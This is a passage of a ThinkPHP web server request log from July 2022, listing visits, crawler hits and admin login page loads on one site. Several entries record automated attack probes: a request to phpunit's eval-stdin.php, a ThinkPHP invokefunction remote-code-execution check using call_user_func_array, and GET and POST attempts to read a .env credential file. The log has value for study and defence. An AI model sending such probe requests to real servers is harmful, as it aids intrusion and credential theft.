] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/index.php [ info ] [ RUN ] app\admin\controller\Index->login[ /alidata/www/gendan/application/admin/controller/Index.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/index/login.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'background', 6 => 'title', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000112s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T22:41:15+08:00 ] 180.149.125.169 GET /c/ [ info ] 47.105.33.115/c/ [运行时间:0.019810s][吞吐率:50.48req/s] [内存消耗:2,225.85kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000040s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001249s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'c', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T22:42:30+08:00 ] 185.7.214.104 GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [ info ] 47.105.33.115:443/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php [运行时间:0.020830s][吞吐率:48.01req/s] [内存消耗:2,230.00kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001150s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'vendor', 1 => 'phpunit', 2 => 'phpunit', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'content-length' => '19', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( 'src' => 'Util', 'PHP' => 'eval-stdin.php', ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T22:44:19+08:00 ] 167.94.138.47 GET / [ info ] 47.105.33.115:443/ [运行时间:0.029528s][吞吐率:33.87req/s] [内存消耗:3,331.98kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001183s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001768s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000133s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T22:44:20+08:00 ] 167.94.138.47 GET / [ info ] 47.105.33.115/ [运行时间:0.028435s][吞吐率:35.17req/s] [内存消耗:3,332.88kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000053s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001087s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001566s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000104s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:06:28+08:00 ] 185.7.214.104 GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 [ info ] 47.105.33.115:443/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 [运行时间:0.020796s][吞吐率:48.09req/s] [内存消耗:2,248.66kb] [文件加载:52] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001163s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'Index', 1 => '\\think\\app', 2 => 'invokefunction', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36', 'accept-encoding' => 'gzip', 'connection' => 'close', ) [ info ] [ PARAM ] array ( 'function' => 'call_user_func_array', 'vars' => array ( 0 => 'md5', 1 => array ( 0 => 'HelloThinkPHP21', ), ), ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/index/lang/zh-cn.php [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:16:02+08:00 ] 183.136.225.35 GET / [ info ] 47.105.33.115:443/ [运行时间:0.033672s][吞吐率:29.70req/s] [内存消耗:3,333.02kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000088s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001323s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:443', 'user-agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001860s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000124s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:35:34+08:00 ] 85.25.177.176 GET / [ info ] clcoa.com/ [运行时间:0.028778s][吞吐率:34.75req/s] [内存消耗:3,285.33kb] [文件加载:67] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001213s ] [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'accept-encoding' => 'x-gzip, gzip', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'accept-language' => 'en-us,en-gb,en;q=0.7,*;q=0.3', 'accept-charset' => 'utf-8,ISO-8859-1;q=0.7,*;q=0.7', 'host' => 'clcoa.com', 'connection' => 'Keep-Alive', 'user-agent' => 'Mozilla/5.0 (compatible; seocompany/0.6; +; )', ) [ info ] [ PARAM ] array ( ) [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001542s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000089s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:35:35+08:00 ] 85.25.177.176 GET / [ info ] clcoa.com/ [运行时间:0.028160s][吞吐率:35.51req/s] [内存消耗:3,333.33kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001161s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0', 'host' => 'clcoa.com', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001587s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000095s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:35:36+08:00 ] 85.25.177.176 GET /admin/index/login?url=%2F [ info ] clcoa.com/admin/index/login?url=%2F [运行时间:0.029951s][吞吐率:33.39req/s] [内存消耗:3,838.02kb] [文件加载:72] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000054s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001065s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'index', 2 => 'login', ), ) [ info ] [ HEADER ] array ( 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0', 'host' => 'clcoa.com', 'connection' => 'Keep-Alive', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( 'url' => '/', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001483s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn/index.php [ info ] [ RUN ] app\admin\controller\Index->login[ /alidata/www/gendan/application/admin/controller/Index.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/index/login.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'background', 6 => 'title', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000091s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:38:36+08:00 ] 20.199.113.252 GET /.env [ info ] 47.105.33.115/.env [运行时间:0.020210s][吞吐率:49.48req/s] [内存消耗:2,226.27kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001168s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.env', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', ) [ info ] [ PARAM ] array ( ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:38:36+08:00 ] 20.199.113.252 POST /.env [ info ] 47.105.33.115/.env [运行时间:0.020648s][吞吐率:48.43req/s] [内存消耗:2,227.81kb] [文件加载:51] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000043s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001202s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '.env', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'accept-encoding' => 'gzip, deflate', 'accept' => '*/*', 'connection' => 'keep-alive', 'content-length' => '17', 'content-type' => 'application/x-www-form-urlencoded', ) [ info ] [ PARAM ] array ( '0x01' => array ( 0 => 'legion', ), ) [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:42:05+08:00 ] 45.33.96.205 GET / [ info ] 47.105.33.115/ [运行时间:0.029645s][吞吐率:33.73req/s] [内存消耗:3,333.41kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000057s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001200s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001594s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000090s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:46:01+08:00 ] 128.14.141.34 GET / [ info ] 47.105.33.115/ [运行时间:0.030778s][吞吐率:32.49req/s] [内存消耗:3,333.13kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000044s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001169s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115', 'user-agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36', 'accept' => '*/*', 'accept-encoding' => 'gzip', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001631s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000099s ] [ info ] [ LOG ] INIT File --------------------------------------------------------------- [ 2022-07-20T23:48:45+08:00 ] 95.215.234.33 GET / [ info ] 47.105.33.115:80/ [运行时间:0.027183s][吞吐率:36.79req/s] [内存消耗:3,332.60kb] [文件加载:69] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000039s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001060s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => '', 1 => NULL, 2 => NULL, ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:80', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'content-length' => '0', ) [ info ] [ PARAM ] array ( ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001589s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ VIEW ] /alidata/www/gendan/public/../application/common/view/tpl/dispatch_jump.tpl [ array ( 0 => 'code', 1 => 'msg', 2 => 'data', 3 => 'url', 4 => 'wait', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000091s ] [ info ] [ LOG ] INIT File